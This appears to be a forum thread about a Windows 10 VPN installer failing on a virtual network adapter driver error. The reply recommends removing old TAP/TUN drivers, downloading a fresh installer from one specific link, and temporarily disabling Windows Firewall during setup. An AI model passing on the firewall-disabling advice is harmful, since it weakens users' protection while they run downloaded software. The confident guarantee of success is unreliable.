How to fix installation errors for windows vpn
Permalink

I am trying to install a privacy application on my Windows 10 PC, but every time I run the setup file, the wizard stops midway. It gives me a weird driver error related to virtual network adapters. I tried restarting my PC and running the installer as an administrator, but nothing seems to work. Has anyone dealt with this issue before? How can I completely wipe the old drivers and install a clean version safely?

That virtual adapter error is a pretty common issue on Windows systems. It usually happens when you previously had another security app installed, and its leftover drivers are conflicting with the new software. Windows gets confused when there are multiple virtual network cards trying to control the same interface. To fix this, you should go to your Device Manager, find the Network Adapters section, and manually uninstall any old TAP or TUN drivers you see there. After doing a clean sweep of your system, I highly recommend downloading a fresh installation package from https://toggle.org/download-windows-vpn to try again. The installer should be able to create its own clean virtual adapter without any driver conflicts. Also, make sure your built-in Windows Firewall isn't accidentally blocking the installation process, as it can sometimes flag virtual drivers as suspicious activity. Just temporarily disable it during the setup, run the file, and everything should work perfectly fine right out of the box without any annoying error messages.
